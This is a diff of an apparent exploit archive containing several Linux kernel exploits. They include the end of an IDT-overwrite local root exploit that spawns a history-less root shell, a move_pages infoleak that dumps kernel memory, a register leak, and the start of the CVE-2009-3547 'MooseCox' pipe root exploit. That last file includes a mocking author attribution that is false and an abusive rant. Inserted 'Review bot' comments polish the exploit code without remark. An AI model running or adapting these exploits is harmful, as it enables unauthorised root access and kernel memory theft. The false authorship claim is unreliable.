SOCK_DGRAM, 0, pi) < 0) - return -1; - - send(pi[0], "a", 1, 0); - stab[i] = pi[1]; - } - - /* highest fd and first descriptor */ - fd = pi[1]; - /* we've to allocate this separately because we need to have - it's fd preserved - using this we'll be writing actual bytes */ - epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); - //printf("EPOLL_CTL_ADD count %u\n",count); - for (i = 0, c = 0; i < (count-1); i++) - { - int n; - n = dup2(stab[i/DIV], fd+2+(i % DIV)); - if (n < 0) - return -1; - epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); - close(n); - } - - /* in 'n' we've the 
latest fd we're using to write data */ - for (i = 0; i < ((num+7)/8); i++) - { - /* data being written from end */ - memcpy(&ev.data, buf + num - 8 - i * 8, 8); - epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); - - /* the actual kernel magic */ - ptr = (base + num - (i*8)) - (count * 12); - struct epoll_event *events =(struct epoll_event *)ptr; - //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); - int iret =epoll_wait(efd, (void *) ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - /* don't ask why (rotten rb-trees) :) */ - if (i) - { - //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); - iret = epoll_wait(efd, (void *)ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - - } - } - - close(efd); - for (i = 3; i <= fd; i++) - close(i); - - return 0; - -} - -/* real-mode interrupt table fixup - point all interrupts to iret. 
-let's hope this will shut up apm */ -static void -fixint(char *buf) -{ -unsigned *tab = (void *) buf; -int i; - - for (i = 0; i < 256; i++) - tab[i] = 0x0000400; /* 0000:0400h */ - /* iret */ - buf[0x400] =0xcf; -} - -/* establish pte pointing to virtual addr 'addr' */ -static int -map_pte(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 8); - buf[(pagenr) * 1024] = MKPTE(addr); - buf[(pagenr) * 1024+1] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4); -} - -/* make pme user can rw */ -static int -map_pme(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 32); - buf[(pagenr) * 1024] = MKPMD(addr); - buf[(pagenr) * 1024+1] = 0; - buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; - buf[(pagenr) * 1024+3] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); -} - - -static void -error(int d) -{ - printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); - exit(1); -} - - char *bashargv[] = { KRADPS1, NULL }; - char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", - "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", - "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; - -static int -exploit(unsigned kernelbase, int npages) -{ - struct idt *idt; - struct idtr idtr; - - - - signal(SIGSEGV, error); - signal(SIGBUS, error); - - - /* get idt descriptor addr */ - asm ("sidt %0" : "=m" (idtr)); - /* - * if OS in vmware , idtr.base is not right,please fix it - * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table - * c0461000 D idt_table - * //idtr.base = 0xc0461000; - */ - - printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); - - if ( !definePAE ) - { - map_pte(kernelbase, npages, idtr.base - kernelbase); - // idt = pae?(void *)MAP_PAE:(void *)MAP; - idt = (struct idt *)MAP; - }else - { - /* TODO: pse disable case 
*/ - if ( !havepse) - printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); - - map_pme(kernelbase, npages, idtr.base - kernelbase); - idt = (struct idt *) idtr.base; - } - -#if 0 - int * p = (int *) idt; - int i; - for (i=0;i<1024;i++,p++) - printf( "* %p 0x%x\n",p,*p); - fflush(stdout); -#endif - - /** - * cleanup the stuff to prevent others spotting the gate - * - must be done from ring 0 - */ - clear1 = (void *) &idt[0x7f]; - printf("[+] idt[0x7f] addr %p\n",clear1); - - if ( exploitway == 0) - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); - } - else - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - } - - //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - /** - * also can use [2] stub function,but it may cause this message - * - * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 - * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 - * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 - * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 - * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb - * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 - * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f - * - */ - - /* call raise_cap or kernel */ - asm ("int $0x7f"); - printf(KRADP "j00 1u(k7 k1d!\n"); - setresuid(0, 0, 0); - setresgid(0, 0, 0); - char cmdbuf[1024]; - snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); - system(cmdbuf); - - execve("/bin/sh", bashargv, bashenvp); - exit(0); -} - - - -static void -usage(char *n) -{ - - printf("\nUsage: %s\n",n); - printf("\t-s forced cpu flag pse \n"); - printf("\t-a define CONFIG_X86_PAE,default none\n"); - printf("\t-e have two kernel code,default 0\n"); - printf("\t-p alloc pages(4k) ,default 1. 
Increase from 1 to 7\n" - "\t\tThe higher number the more likely it will crash\n"); - printf("\t-t default 0 \n" - "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n"); - printf("\n"); - _exit(1); -} - - -/*read /proc/cpuinfo to set havepse*/ -static void -read_proc(void) -{ - FILE * fp; - char * line = NULL; - size_t len = 0; - ssize_t read; - printf("[+] try open /proc/cpuinfo .."); - fp = fopen("/proc/cpuinfo", "r"); - if (fp == NULL) - { - printf(" failed!!\n"); - return; - } - printf(" ok!!\n"); - - int cpus = 0; - int pse = 0; - while ((read = getline(&line, &len, fp)) != -1) - { - - if (strstr(line,"flags")) - { - if(strstr(line ,"pse ")) - { - pse ++; - } - } - - } - fclose(fp); - - if (line) - free(line); - - if ( pse ) - { - printf("[+] find cpu flag pse in /proc/cpuinfo\n"); - havepse = 1; - } - - return ; - -} - -static void -get_config(int ac, char **av) -{ - - uid = getuid(); - progargv0 = av[0]; - - int r; - - while(ac) { - r = getopt(ac, av, "e:p:t:ash"); - - if(r<0) break; - - switch(r) { - - case 's' : - //pse - havepse = 1; - break; - - case 'a' : - //define CONFIG_X86_PAE - definePAE = 1; - break; - - case 'e' : - exploitway = atoi(optarg); - if(exploitway<0) fatal("bad exploitway value"); - break; - - case 'p' : - npages = atoi(optarg); - break; - case 't' : - thread_size = atoi(optarg); - - break; - - case 'h' : - default: - usage(av[0]); - break; - } - } - - THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192); - - read_proc(); -} - -static void -print_config(unsigned long kernebase) -{ - printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none"); - printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none"); - printf("[+] Exploit Way : %d\n", exploitway); - printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n", - npages,kernebase,kernebase+npages*4 kB); - printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size); - fflush(stdout); -} - - -void prepare(void) -{ - if (geteuid() == 
0) - { - setresuid(0, 0, 0); - setresgid(0, 0, 0); - execve("/bin/sh", bashargv, bashenvp); - fatal("[-] Unable to spawn shell"); - } -} - -int -main(int argc, char **argv) -{ - char eater[65536]; - unsigned long kernelbase; - - /* unlink(argv[0]); */ - // sync(); - - printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" - KRS "Discovered Jan 2005 by sd " KRE "\n" - KRS "Modified 2005/9 by alert7 " KRE "\n"); - - if ( (unsigned long)eater > 0xc0000000) - { - printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); - return 0; - } - - prepare(); - - get_config(argc,argv); - - kernelbase =(unsigned long)eater ; - kernelbase +=0x0fffffff; - kernelbase &=0xf0000000; - - print_config(kernelbase); - - exploit(kernelbase, npages<0?-npages:npages); - - return 0; - -} - -// milw0rm.com [2005-12-30] - - diff --git a/platforms/linux/local/40810.c b/platforms/linux/local/40810.c new file mode 100755 index 000000000..6c479d902 --- /dev/null +++ b/platforms/linux/local/40810.c 
@@ -0,0 +1,323 @@ +/* sieve (because the Linux kernel leaks like one, get it?) + Bug NOT discovered by Marcus Meissner of SuSE security + This bug was discovered by Ramon de Carvalho Valle in September of 2009 + The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS + for the bug (but had forgotten about it until now) + Ramon's report was sent to Novell's internal bugzilla, upon which + some months later Marcus took credit for discovering someone else's bug + Maybe he thought he could get away with it ;) Almost ;) + + greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle! + + first exploit of 2010, next one will be for a bugclass that has + afaik never been exploited on Linux before + + note that this bug can also cause a DoS like so: + +Unable to handle kernel paging request at ffffffff833c3be8 RIP: + [] new_page_node+0x31/0x48 +PGD 203067 PUD 205063 PMD 0 +Oops: 0000 [1] SMP +Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1 +RIP: 0010:[] [] +new_page_node+0x31/0x48 +RSP: 0018:ffff8100a3c6de50 EFLAGS: 00010246 +RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013 +RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2 +RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c +R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018 +R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28 +FS: 00002b8481125810(0000) GS:ffffffff803c0000(0000) +knlGS:0000000000000000 +CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0 +Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task +ffff81009d8c4080) +Stack: ffffffff800dd008 ffffc20000077000 ffffffff800dc87b +0000000000000000 + 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003 + 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000 +Call Trace: + [] migrate_pages+0x8d/0x42b + [] new_page_node+0x0/0x48 + [] 
schedule_on_each_cpu+0xda/0xe8 + [] sys_move_pages+0x339/0x43d + [] tracesys+0xd5/0xe0 + + +Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff +RIP [] new_page_node+0x31/0x48 + RSP +CR2: ffffffff833c3be8 +*/ + +#include +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include "exp_framework.h" + +#undef MPOL_MF_MOVE +#define MPOL_MF_MOVE (1 << 1) + +int max_numnodes; + +unsigned long node_online_map; + +unsigned long node_states; + +unsigned long our_base; +unsigned long totalhigh_pages; + +#undef __NR_move_pages +#ifdef __x86_64__ +#define __NR_move_pages 279 +#else +#define __NR_move_pages 317 +#endif + +/* random notes I took when writing this (all applying to the 64bit case): + +checking in a bitmap based on node_states[2] or node_states[3] +(former if HIGHMEM is not present, latter if it is) + +each node_state is of type nodemask_t, which is is a bitmap of size +MAX_NUMNODES/8 + +RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size + +so the effective base we're working with is either node_states + 16 or +node_states + 24 + +on 2.6.18 it's based off node_online_map + +node_isset does a test_bit based on this base + +so our specfic case does: base[ourval / 8] & (1 << (ourval & 7)) + +all the calculations appear to be signed, so we can both index in the +negative and positive direction, based on ourval + +on 64bit, this gives us a 256MB range above and below our base to grab +memory of +(by passing in a single page and a single node for each bit we want to +leak the value of, we can reconstruct entire bytes) + +we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps, +subtracting their difference, and multiplying by 8 +but we don't need to do this +*/ + +struct exploit_state *exp_state; + +char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak"; + +int get_exploit_state_ptr(struct exploit_state *ptr) +{ + exp_state = ptr; + return 0; +} + +int requires_null_page = 0; + +void 
addr_to_nodes(unsigned long addr, int *nodes) +{ + int i; + int min = 0x80000000 / 8; + int max = 0x7fffffff / 8; + + if ((addr < (our_base - min)) || + (addr > (our_base + max))) { + fprintf(stdout, "Error: Unable to dump address %p\n", addr); + exit(1); + } + + for (i = 0; i < 8; i++) { + nodes[i] = ((int)(addr - our_base) << 3) | i; + } + + return; +} + +char *buf; +unsigned char get_byte_at_addr(unsigned long addr) +{ + int nodes[8]; + int node; + int status; + int i; + int ret; + unsigned char tmp = 0; + + addr_to_nodes(addr, (int *)&nodes); + for (i = 0; i < 8; i++) { + node = nodes[i]; + ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); + if (errno == ENOSYS) { + fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); + exit(1); + } else if (errno != ENODEV) + tmp |= (1 << i); + } + + return tmp; +} + +void menu(void) +{ + fprintf(stdout, "Enter your choice:\n" + " [0] Dump via symbol/address with length\n" + " [1] Dump entire range to file\n" + " [2] Quit\n"); +} + +int trigger(void) +{ + unsigned long addr; + unsigned long addr2; + unsigned char thebyte; + unsigned char choice = 0; + char ibuf[1024]; + char *p; + FILE *f; + + // get lingering \n + getchar(); + while (choice != '2') { + menu(); + fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); + choice = ibuf[0]; + + switch (choice) { + case '0': + fprintf(stdout, "Enter the symbol or address for the base:\n"); + fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); + p = strrchr((char *)&ibuf, '\n'); + if (p) + *p = '\0'; + addr = exp_state->get_kernel_sym(ibuf); + if (addr == 0) { + addr = strtoul(ibuf, NULL, 16); + } + if (addr == 0) { + fprintf(stdout, "Invalid symbol or address.\n"); + break; + } + addr2 = 0; + while (addr2 == 0) { + fprintf(stdout, "Enter the length of bytes to read in hex:\n"); + fscanf(stdin, "%x", &addr2); + // get lingering \n + getchar(); + } + addr2 += addr; + + fprintf(stdout, "Leaked bytes:\n"); + while (addr < addr2) { + thebyte = 
get_byte_at_addr(addr); + printf("%02x ", thebyte); + addr++; + } + printf("\n"); + break; + case '1': + addr = our_base - 0x10000000; +#ifdef __x86_64__ + /* + our lower bound will cause us to access + bad addresses and cause an oops + */ + if (addr < 0xffffffff80000000) + addr = 0xffffffff80000000; +#else + if (addr < 0x80000000) + addr = 0x80000000; + else if (addr < 0xc0000000) + addr = 0xc0000000; +#endif + addr2 = our_base + 0x10000000; + f = fopen("./kernel.bin", "w"); + if (f == NULL) { + fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n"); + exit(1); + } + + fprintf(stdout, "Dumping to kernel.bin (this will take a while): "); + fflush(stdout); + while (addr < addr2) { + thebyte = get_byte_at_addr(addr); + fputc(thebyte, f); + if (!(addr % (128 * 1024))) { + fprintf(stdout, "."); + fflush(stdout); + } + addr++; + } + fprintf(stdout, "done.\n"); + fclose(f); + break; + case '2': + break; + } + } + + return 0; +} + + +int prepare(unsigned char *ptr) +{ + int node; + int found_gap = 0; + int i; + int ret; + int status; + + totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages"); + node_states = exp_state->get_kernel_sym("node_states"); + node_online_map = exp_state->get_kernel_sym("node_online_map"); + + buf = malloc(4096); + + /* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted + towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table, + which will be set for our single node -- this gives us the size of the bitmap + */ + for (i = 0; i < 512; i++) { + node = i; + ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); + if (errno == ENOSYS) { + fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); + exit(1); + } else if (errno == ENODEV) { + found_gap = 1; + } else if (found_gap == 1) { + max_numnodes = i; + fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes); + break; + } + } + + if 
(node_online_map != 0) + our_base = node_online_map; + /* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size + of each bitmap in the array our base is in the middle of + we've taken account for all this + */ + else if (node_states != 0) + our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8))); + else { + fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n"); + exit(1); + } + + return 0; +} + +int post(void) +{ + return 0; +} \ No newline at end of file diff --git a/platforms/linux/local/40811.c b/platforms/linux/local/40811.c new file mode 100755 index 000000000..527bffd48 --- /dev/null +++ b/platforms/linux/local/40811.c 
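Review bot: `addr_to_nodes` formats an `unsigned long` with `%p` in its error message, and `trigger` reads the byte count with `fscanf(stdin, "%x", &addr2)` into an `unsigned long`; both are format/argument mismatches that are undefined in C and only behave on this target because `addr2` is pre-zeroed before the partial write. Use `%lx` in both places (or cast to `(void *)` for the `%p` case). In `prepare`, the `malloc(4096)` result in `buf` is handed to the syscall without a NULL check, which is inconsistent with the explicit `fprintf`/`exit(1)` error handling used for every other failure in the file; `if (!buf) { fprintf(stdout, "Error: out of memory\n"); exit(1); }` would match that style. The `(char *)&ibuf` and `(int *)&nodes` casts are also unnecessary since an array already decays to the needed pointer type.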
@@ -0,0 +1,132 @@ +/* written by Ingo Molnar -- it's true because this comment says the exploit + was written by him! +*/ + +#include +#include + +unsigned int _r81; +unsigned int _r82; +unsigned int _r91; +unsigned int _r92; +unsigned int _r101; +unsigned int _r102; +unsigned int _r111; +unsigned int _r112; +unsigned int _r121; +unsigned int _r122; +unsigned int _r131; +unsigned int _r132; +unsigned int _r141; +unsigned int _r142; +unsigned int _r151; +unsigned int _r152; + +int leak_it(void) +{ + asm volatile ( + ".intel_syntax noprefix\n" + ".code32\n" + "jmp label1\n" + "farcalllabel1:\n" + ".code64\n" + "mov eax, r8d\n" + "shr r8, 32\n" + "mov ebx, r8d\n" + "mov ecx, r9d\n" + "shr r9, 32\n" + "mov edx, r9d\n" + "mov esi, r10d\n" + "shr r10, 32\n" + "mov edi, r10d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + "farcalllabel2:\n" + "mov eax, r11d\n" + "shr r11, 32\n" + "mov ebx, r11d\n" + "mov ecx, r12d\n" + "shr r12, 32\n" + "mov edx, r12d\n" + "mov esi, r13d\n" + "shr r13, 32\n" + "mov edi, r13d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + "farcalllabel3:\n" + "mov eax, r14d\n" + "shr r14, 32\n" + "mov ebx, r14d\n" + "mov ecx, r15d\n" + "shr r15, 32\n" + "mov edx, r15d\n" + ".att_syntax noprefix\n" + "lret\n" + ".intel_syntax noprefix\n" + ".code32\n" + "label1:\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel1\n" + ".intel_syntax noprefix\n" + "mov _r81, eax\n" + "mov _r82, ebx\n" + "mov _r91, ecx\n" + "mov _r92, edx\n" + "mov _r101, esi\n" + "mov _r102, edi\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel2\n" + ".intel_syntax noprefix\n" + "mov _r111, eax\n" + "mov _r112, ebx\n" + "mov _r121, ecx\n" + "mov _r122, edx\n" + "mov _r131, esi\n" + "mov _r132, edi\n" + ".att_syntax noprefix\n" + "lcall $0x33, $farcalllabel3\n" + ".intel_syntax noprefix\n" + "mov _r141, eax\n" + "mov _r142, ebx\n" + "mov _r151, ecx\n" + "mov _r152, edx\n" + ".att_syntax noprefix\n" + ); + + printf(" 
R8=%08x%08x\n", _r82, _r81); + printf(" R9=%08x%08x\n", _r92, _r91); + printf("R10=%08x%08x\n", _r102, _r101); + printf("R11=%08x%08x\n", _r112, _r111); + printf("R12=%08x%08x\n", _r122, _r121); + printf("R13=%08x%08x\n", _r132, _r131); + printf("R14=%08x%08x\n", _r142, _r141); + printf("R15=%08x%08x\n", _r152, _r151); + return 0; +} + +/* ripped from jon oberheide */ +const int randcalls[] = { + __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat, + __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, + __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, + __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, + __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, + __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid, + __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, + __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, + __NR_sched_getparam, __NR_sched_get_priority_max +}; + +int main(void) +{ + /* to keep random stack values from being used for pointers in syscalls */ + char buf[64] = {}; + int call; + for (call = 0; call < sizeof(randcalls)/sizeof(randcalls[0]); call++) { + syscall(randcalls[call]); + leak_it(); + } + +} \ No newline at end of file diff --git a/platforms/linux/local/40812.c b/platforms/linux/local/40812.c new file mode 100755 index 000000000..58ebb6a58 --- /dev/null +++ b/platforms/linux/local/40812.c 
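Review bot: The `asm volatile` statement in `leak_it` writes `eax`, `ebx`, `ecx`, `edx`, `esi`, `edi` and the flags but declares no clobber list, so the compiler may keep live values (including the PIC base in `ebx` on i386) in those registers across the block; add `: : : "eax", "ebx", "ecx", "edx", "esi", "edi", "memory", "cc"` to the statement. `main` declares `char buf[64] = {}` and never references it; the comment above it suggests the array is meant to occupy stack space deliberately, and a `(void)buf;` or a comment stating that it is intentionally unused would make that explicit and silence the unused-variable warning. The loop condition compares the `int` index `call` against a `size_t` expression, which trips `-Wsign-compare`; declaring `call` as `size_t` avoids it. `main` also falls off the end without a `return` statement, which is only well-defined under C99 and later.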
@@ -0,0 +1,468 @@ +/* exp_moosecox.c + Watch a video of the exploit here: + http://www.youtube.com/watch?v=jt81NvaOj5Y + + developed entirely by Ingo Molnar (exploit writer extraordinaire!) , + thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :) + + dedicated to the Red Hat employees who get paid to copy+paste my + twitter and issue security advisories, their sweet + acknowledgement policy, and general classiness + see: https://bugzilla.redhat.com/show_activity.cgi?id=530490 + + "policy" aside, there's a word for what you guys are doing: "plagiarism" + in fact, i tested this one day by posting three links to twitter, + without any discussion on any of them. the same day, those three + (and only those three) links were assigned CVEs, even though two of + them weren't even security bugs (it doesn't pay to copy+paste) + + official Ingo Molnar (that's me) policy for acknowledgement in + exploits requires general douche-ness or plagiarization + official policy further dictates immediate exploit release for + embargoed, patched bug + + I'll be curious to see what the CVE statistics are like for the + kernel this year when they get compiled next year -- I'm predicting + that when someone's watching the sleepy watchers, a more personal + interest is taken in doing the job that you're paid to do correctly. + + -------------------------------------------------------------------- + + Special PS note to Theo (I can do this here because I know he'll + never read it -- the guy is apparently oblivious to the entire world of + security around him -- the same world that invents the protections + years before him that he pats himself on the back for "innovating") + Seriously though, it's incredible to me that an entire team + of developers whose sole purpose is to develop a secure operating + system can be so oblivious to the rest of the world. 
They haven't + innovated since they replaced exploitable string copies with + exploitable string truncations 6 or so years ago. + + The entire joke of a thread can be read here: + http://www.pubbs.net/openbsd/200911/4582/ + "Our focus therefore is always on finding innovative ideas which make + bugs very hard to exploit succesfully." + "He's too busy watching monkey porn instead of + building researching last-year's security technology that will stop + an exploit technique that has been exploited multiple times." + "it seems that everyone else is slowly coming around to the + same solution." + + So let's talk about this "innovation" of theirs with their + implementation of mmap_min_addr: + + They implemented it in 2008, a year after Linux implemented it, a + year after the public phrack article on the bug class, more than a + year after my mail to dailydave with the first public Linux kernel + exploit for the bug class, and over two years after UDEREF was + implemented in PaX (providing complete protection against the smaller + subset of null ptr dereference bugs and the larger class of invalid + userland access in general). + + OpenBSD had a public null pointer dereference exploit (agp_ioctl()) + published for its OS in January of 2007. It took them over a year + and a half to implement the same feature that was implemented in + Linux a few months after my public exploit in 2007. + + So how can it be that "everyone else is slowly coming around to the + same solution" when "everyone else" came to that solution over a + year before you Theo? In fact, I prediced this exact situation would + happen back in 2007 in my DD post: + http://lists.virus.org/dailydave-0703/msg00011.html + "Expect OpenBSD to independently invent a protection against null ptr + deref bugs sometime in 2009." + + Let's talk about some more "innovation" -- position independent + executables. PaX implemented position independent executables on + Linux back in 2001 (ET_DYN). 
PIE binary support was added to GNU + binutils in 2003. Those OpenBSD innovators implemented PIE binaries + in 2008, 7 years after PaX. Innovation indeed! + + How about their W^X/ASLR innovation? These plagiarists have the + audacity to announce on their press page: + http://www.openbsd.org/press.html + "Microsoft borrows one of OpenBSD's security features for Vista, + stack/library randomization, under the name Address Space Layout + Randomization (ASLR). "Until now, the feature has been most + prominently used in the OpenBSD Unix variant and the PaX and Exec + Shield security patches for Linux"" + Borrowing one of your features? Where'd this ASLR acronym come from + anyway? Oh that's right, PaX again -- when they published the first + design and implementation of it, and coined the term, in July 2001. + It covered the heap, mmap, and stack areas. + OpenBSD implemented "stack-gap randomization" in 2003. Way to + innovate! + + W^X, which is a horrible name as OpenBSD doesn't even enforce it with + mprotect restrictions like PaX did from the beginning or even SELinux + is doing now (from a 3rd party contribution modeled after PaX): + PaX implemented true per-page non-executable page support, protecting + binary data, the heap, and the stack, back in 2000. + OpenBSD implemented it in 2003, requiring a full userland rebuild. + The innovation is overwhelming! + + They keep coming up with the same exact "innovations" others came up + with years before them. Their official explanation for where they + got the W^X/ASLR ideas was a drunk guy came into their tent at one of + their hack-a-thons and started talking about the idea. They had + never heard of PaX when we asked them in 2003. 
Which makes the + following involuntarily contributed private ICB logs from Phrack #66 + (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing: + + On some sunny day in July 2002 (t: Theo de Raadt): + why can't you just randomize the base + that's what PaX does + You've not been paying attention to what art's saying, or you don't + understand yet, either case is one of think it through yourself. + whatever + + Only to see poetic justice in August 2003 (ttt: Theo again): + + more exactly, we heard of pax when they started bitching + miod, that was very well spoken. + + That wraps up our OpenBSD history lesson, in case anyone forgot it. + PS -- enjoy that null ptr deref exploit just released for OpenBSD. + + -------------------------------------------------------------------- + + Important final exploit notes: + + don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK, + or DEBUG_SPINLOCK are enabled and modify the structures below + accordingly -- a fancier exploit would do this automatically + + I've broken the 2.4->2.6.10 version of the exploit and would like to see + someone fix it ;) See below for more comments on this. +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "exp_framework.h" + +int pipefd[2]; +struct exploit_state *exp_state; +int is_old_kernel = 0; + +int go_go_speed_racer(void *unused) +{ + int ret; + + while(!exp_state->got_ring0) { + /* bust spinlock */ + *(unsigned int *)NULL = is_old_kernel ? 
0 : 1; + ret = pipe(pipefd); + if (!ret) { + close(pipefd[0]); + close(pipefd[1]); + } + } + + return 0; +} + +/* <3 twiz/sgrakkyu */ +int start_thread(int (*f)(void *), void *arg) +{ + char *stack = malloc(0x4000); + int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg); + if (tid < 0) { + printf("can't create thread\n"); + exit(1); + } + sleep(1); + return tid; +} + +char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root"; +char *cve = "CVE-2009-3547"; + +#define PIPE_BUFFERS 16 + +/* this changes on older kernels, but it doesn't matter to our method */ +struct pipe_buf_operations { + int can_merge; + void *map; + void *unmap; + void *confirm; + void *release; + void *steal; + void *get; +}; + +struct pipe_buffer2620ornewer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +struct pipe_buffer2619orolder { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; +}; + +struct pipe_buffer2616orolder { + void *page; + unsigned int offset, len; + void *ops; +}; + +struct pipe_inode_info2620ornewer { + unsigned int spinlock; + /* + // LOCKBREAK + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + void *owner; + */ + void *next, *prev; + unsigned int nrbufs, curbuf; + void *tmp_page; + unsigned int readers; + unsigned int writers; + unsigned int waiting_writers; + unsigned int r_counter; + unsigned int w_counter; + void *fasync_readers; + void *fasync_writers; + void *inode; + struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS]; +}; + +struct pipe_inode_info2619orolder { + unsigned int spinlock; + /* + // if PREEMPT enabled + unsigned int break_lock; + // DEBUG_SPINLOCK + unsigned int magic, owner_cpu; + void *owner; + */ + void *next, *prev; + unsigned int nrbufs, curbuf; + struct pipe_buffer2619orolder bufs[PIPE_BUFFERS]; + void *tmp_page; + unsigned int start; + unsigned int readers; + unsigned int 
